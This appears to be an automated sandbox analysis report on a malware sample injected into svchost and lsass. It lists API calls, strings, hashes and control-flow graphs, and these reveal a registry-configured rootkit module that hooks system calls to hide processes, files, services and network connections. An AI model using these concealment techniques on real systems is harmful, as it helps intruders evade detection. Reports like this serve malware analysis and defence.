                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 14911 195dd5c1abc 14917 195dd5c1628 GetProcessHeap 14911->14917 14913 195dd5c1ad2 Sleep SleepEx 14915 195dd5c1acb 14913->14915 14915->14913 14916 195dd5c1598 StrCmpIW StrCmpW 14915->14916 14962 195dd5c18b4 14915->14962 14916->14915 14918 195dd5c1648 _invalid_parameter_noinfo 14917->14918 14979 195dd5c1268 GetProcessHeap 14918->14979 14920 195dd5c1650 14921 195dd5c1268 2 API calls 14920->14921 14922 195dd5c1661 14921->14922 14923 195dd5c1268 2 API calls 14922->14923 14924 195dd5c166a 14923->14924 14925 195dd5c1268 2 API calls 14924->14925 14926 195dd5c1673 14925->14926 14927 195dd5c168e RegOpenKeyExW 14926->14927 14928 195dd5c16c0 RegOpenKeyExW 14927->14928 14929 195dd5c18a6 14927->14929 14930 195dd5c16ff RegOpenKeyExW 14928->14930 14931 195dd5c16e9 14928->14931 14929->14915 14933 195dd5c1723 14930->14933 14934 195dd5c173a RegOpenKeyExW 14930->14934 14983 195dd5c12bc RegQueryInfoKeyW 14931->14983 14994 195dd5c104c RegQueryInfoKeyW 14933->14994 14937 195dd5c175e 14934->14937 14938 195dd5c1775 RegOpenKeyExW 14934->14938 14935 195dd5c16f5 RegCloseKey 14935->14930 14942 195dd5c12bc 11 API calls 14937->14942 14939 195dd5c17b0 RegOpenKeyExW 14938->14939 14940 195dd5c1799 14938->14940 14944 195dd5c17d4 14939->14944 14945 195dd5c17eb RegOpenKeyExW 14939->14945 14943 195dd5c12bc 11 API calls 14940->14943 14946 195dd5c176b RegCloseKey 14942->14946 14947 195dd5c17a6 RegCloseKey 14943->14947 14948 195dd5c12bc 11 API calls 14944->14948 14949 195dd5c180f 14945->14949 14950 195dd5c1826 RegOpenKeyExW 14945->14950 14946->14938 14947->14939 14951 195dd5c17e1 RegCloseKey 14948->14951 14952 195dd5c104c 4 API calls 14949->14952 14953 195dd5c1861 RegOpenKeyExW 14950->14953 14954 195dd5c184a 14950->14954 14951->14945 14957 195dd5c181c RegCloseKey 14952->14957 14955 195dd5c189c RegCloseKey 14953->14955 14956 195dd5c1885 14953->14956 14958 195dd5c104c 4 API calls 14954->14958 14955->14929 14959 195dd5c104c 4 API calls 14956->14959 14957->14950 14960 195dd5c1857 RegCloseKey 14958->14960 14961 195dd5c1892 RegCloseKey 14959->14961 14960->14953 14961->14955 15006 195dd5c14a4 14962->15006 15000 195dd5d6168 14979->15000 14981 195dd5c1283 GetProcessHeap 14982 195dd5c12ae _invalid_parameter_noinfo 14981->14982 14982->14920 14984 195dd5c148a __free_lconv_num 14983->14984 14985 195dd5c1327 GetProcessHeap 14983->14985 14984->14935 14991 195dd5c133e _invalid_parameter_noinfo __free_lconv_num 14985->14991 14986 195dd5c1352 RegEnumValueW 14986->14991 14987 195dd5c1476 GetProcessHeap 14987->14984 14989 195dd5c13d3 GetProcessHeap 14989->14991 14990 195dd5c141e lstrlenW GetProcessHeap 14990->14991 14991->14986 14991->14987 14991->14989 14991->14990 14992 195dd5c13f3 GetProcessHeap 14991->14992 14993 195dd5c1443 StrCpyW 14991->14993 15001 195dd5c152c 14991->15001 14992->14991 14993->14991 14995 195dd5c11b5 RegCloseKey 14994->14995 14997 195dd5c10bf _invalid_parameter_noinfo __free_lconv_num 14994->14997 14995->14934 14996 195dd5c10cf RegEnumValueW 14996->14997 14997->14995 14997->14996 14998 195dd5c114e GetProcessHeap 14997->14998 14999 195dd5c116e GetProcessHeap 14997->14999 14998->14997 14999->14997 15002 195dd5c157c 15001->15002 15003 195dd5c1546 15001->15003 15002->14991 15003->15002 15004 195dd5c155d StrCmpIW 15003->15004 15005 195dd5c1565 StrCmpW 15003->15005 15004->15003 15005->15003 15007 195dd5c14e1 GetProcessHeap 15006->15007 15008 195dd5c14c1 GetProcessHeap 15006->15008 15012 195dd5d6180 15007->15012 15010 195dd5c14da __free_lconv_num 15008->15010 15010->15007 15010->15008 15013 195dd5d6182 15012->15013 15014 195dd59273c 15016 195dd59276a 15014->15016 15015 195dd592858 LoadLibraryA 15015->15016 15016->15015 15017 195dd5928d4 15016->15017

                                                                                Executed Functions

                                                                                Function 00000195DD5C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350
                                                                                Function 00000195DD5C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                                  • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                                • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000195DD5C1ADD
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                                  • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                                  • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750
                                                                                Function 00000195DD5C3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 57 195dd5c3844-195dd5c384f 58 195dd5c3851-195dd5c3864 StrCmpNIW 57->58 59 195dd5c3869-195dd5c3870 57->59 58->59 60 195dd5c3866 58->60 60->59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20
                                                                                Function 00000195DD59273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                                Non-executed Functions

                                                                                Function 00000195DD5C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 369 195dd5c2b2c-195dd5c2ba5 call 195dd5e2ce0 372 195dd5c2ee0-195dd5c2f03 369->372 373 195dd5c2bab-195dd5c2bb1 369->373 373->372 374 195dd5c2bb7-195dd5c2bba 373->374 374->372 375 195dd5c2bc0-195dd5c2bc3 374->375 375->372 376 195dd5c2bc9-195dd5c2bd9 GetModuleHandleA 375->376 377 195dd5c2bed 376->377 378 195dd5c2bdb-195dd5c2beb call 195dd5d6090 376->378 380 195dd5c2bf0-195dd5c2c0e 377->380 378->380 380->372 383 195dd5c2c14-195dd5c2c33 StrCmpNIW 380->383 383->372 384 195dd5c2c39-195dd5c2c3d 383->384 384->372 385 195dd5c2c43-195dd5c2c4d 384->385 385->372 386 195dd5c2c53-195dd5c2c5a 385->386 386->372 387 195dd5c2c60-195dd5c2c73 386->387 388 195dd5c2c83 387->388 389 195dd5c2c75-195dd5c2c81 387->389 390 195dd5c2c86-195dd5c2c8a 388->390 389->390 391 195dd5c2c9a 390->391 392 195dd5c2c8c-195dd5c2c98 390->392 393 195dd5c2c9d-195dd5c2ca7 391->393 392->393 394 195dd5c2d9d-195dd5c2da1 393->394 395 195dd5c2cad-195dd5c2cb0 393->395 396 195dd5c2ed2-195dd5c2eda 394->396 397 195dd5c2da7-195dd5c2daa 394->397 398 195dd5c2cc2-195dd5c2ccc 395->398 399 195dd5c2cb2-195dd5c2cbf call 195dd5c199c 395->399 396->372 396->387 402 195dd5c2dbb-195dd5c2dc5 397->402 403 195dd5c2dac-195dd5c2db8 call 195dd5c199c 397->403 400 195dd5c2cce-195dd5c2cdb 398->400 401 195dd5c2d00-195dd5c2d0a 398->401 399->398 400->401 405 195dd5c2cdd-195dd5c2cea 400->405 406 195dd5c2d3a-195dd5c2d3d 401->406 407 195dd5c2d0c-195dd5c2d19 401->407 409 195dd5c2df5-195dd5c2df8 402->409 410 195dd5c2dc7-195dd5c2dd4 402->410 403->402 414 195dd5c2ced-195dd5c2cf3 405->414 416 195dd5c2d3f-195dd5c2d49 call 195dd5c1bbc 406->416 417 195dd5c2d4b-195dd5c2d58 lstrlenW 406->417 407->406 415 195dd5c2d1b-195dd5c2d28 407->415 412 195dd5c2dfa-195dd5c2e03 call 195dd5c1bbc 409->412 413 195dd5c2e05-195dd5c2e12 lstrlenW 409->413 410->409 419 195dd5c2dd6-195dd5c2de3 410->419 412->413 439 195dd5c2e4a-195dd5c2e55 412->439 423 195dd5c2e14-195dd5c2e1e 413->423 424 195dd5c2e35-195dd5c2e3f call 195dd5c3844 413->424 421 195dd5c2d93-195dd5c2d98 414->421 422 195dd5c2cf9-195dd5c2cfe 414->422 425 195dd5c2d2b-195dd5c2d31 415->425 416->417 416->421 427 195dd5c2d5a-195dd5c2d64 417->427 428 195dd5c2d7b-195dd5c2d8d call 195dd5c3844 417->428 429 195dd5c2de6-195dd5c2dec 419->429 432 195dd5c2e42-195dd5c2e44 421->432 422->401 422->414 423->424 433 195dd5c2e20-195dd5c2e33 call 195dd5c152c 423->433 424->432 425->421 434 195dd5c2d33-195dd5c2d38 425->434 427->428 437 195dd5c2d66-195dd5c2d79 call 195dd5c152c 427->437 428->421 428->432 438 195dd5c2dee-195dd5c2df3 429->438 429->439 432->396 432->439 433->424 433->439 434->406 434->425 437->421 437->428 438->409 438->429 444 195dd5c2ecc-195dd5c2ed0 439->444 445 195dd5c2e57-195dd5c2e5b 439->445 444->396 448 195dd5c2e63-195dd5c2e7d call 195dd5c85c0 445->448 449 195dd5c2e5d-195dd5c2e61 445->449 450 195dd5c2e80-195dd5c2e83 448->450 449->448 449->450 453 195dd5c2e85-195dd5c2ea3 call 195dd5c85c0 450->453 454 195dd5c2ea6-195dd5c2ea9 450->454 453->454 454->444 456 195dd5c2eab-195dd5c2ec9 call 195dd5c85c0 454->456 456->444
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                                • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                                • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                                Function 00000195DD5C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                                Function 00000195DD5CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00
                                                                                Function 00000195DD5C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750
                                                                                Function 00000195DD5C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10
                                                                                Function 00000195DD5C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760
                                                                                Function 00000195DD596910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 211 195dd596910-195dd596916 212 195dd596951-195dd59695b 211->212 213 195dd596918-195dd59691b 211->213 214 195dd596a78-195dd596a8d 212->214 215 195dd59691d-195dd596920 213->215 216 195dd596945-195dd596984 call 195dd596fc0 213->216 220 195dd596a8f 214->220 221 195dd596a9c-195dd596ab6 call 195dd596e54 214->221 218 195dd596922-195dd596925 215->218 219 195dd596938 __scrt_dllmain_crt_thread_attach 215->219 234 195dd596a52 216->234 235 195dd59698a-195dd59699f call 195dd596e54 216->235 226 195dd596931-195dd596936 call 195dd596f04 218->226 227 195dd596927-195dd596930 218->227 224 195dd59693d-195dd596944 219->224 222 195dd596a91-195dd596a9b 220->222 232 195dd596aef-195dd596b20 call 195dd597190 221->232 233 195dd596ab8-195dd596aed call 195dd596f7c call 195dd596e1c call 195dd597318 call 195dd597130 call 195dd597154 call 195dd596fac 221->233 226->224 243 195dd596b22-195dd596b28 232->243 244 195dd596b31-195dd596b37 232->244 233->222 238 195dd596a54-195dd596a69 234->238 246 195dd5969a5-195dd5969b6 call 195dd596ec4 235->246 247 195dd596a6a-195dd596a77 call 195dd597190 235->247 243->244 248 195dd596b2a-195dd596b2c 243->248 249 195dd596b7e-195dd596b94 call 195dd59268c 244->249 250 195dd596b39-195dd596b43 244->250 261 195dd5969b8-195dd5969dc call 195dd5972dc call 195dd596e0c call 195dd596e38 call 195dd59ac0c 246->261 262 195dd596a07-195dd596a11 call 195dd597130 246->262 247->214 255 195dd596c1f-195dd596c2c 248->255 268 195dd596b96-195dd596b98 249->268 269 195dd596bcc-195dd596bce 249->269 256 195dd596b4f-195dd596b5d call 195dd5a5780 250->256 257 195dd596b45-195dd596b4d 250->257 264 195dd596b63-195dd596b78 call 195dd596910 256->264 278 195dd596c15-195dd596c1d 256->278 257->264 261->262 314 195dd5969de-195dd5969e5 __scrt_dllmain_after_initialize_c 261->314 262->234 282 195dd596a13-195dd596a1f call 195dd597180 262->282 264->249 264->278 268->269 275 195dd596b9a-195dd596bbc call 195dd59268c call 195dd596a78 268->275 276 195dd596bd0-195dd596bd3 269->276 277 195dd596bd5-195dd596bea call 195dd596910 269->277 275->269 308 195dd596bbe-195dd596bc6 call 195dd5a5780 275->308 276->277 276->278 277->278 296 195dd596bec-195dd596bf6 277->296 278->255 301 195dd596a21-195dd596a2b call 195dd597098 282->301 302 195dd596a45-195dd596a50 282->302 298 195dd596c01-195dd596c11 call 195dd5a5780 296->298 299 195dd596bf8-195dd596bff 296->299 298->278 299->278 301->302 313 195dd596a2d-195dd596a3b 301->313 302->238 308->269 313->302 314->262 315 195dd5969e7-195dd596a04 call 195dd59abc8 314->315 315->262
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00
                                                                                Function 00000195DD5CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                                • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                                  • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                                  • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                                  • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
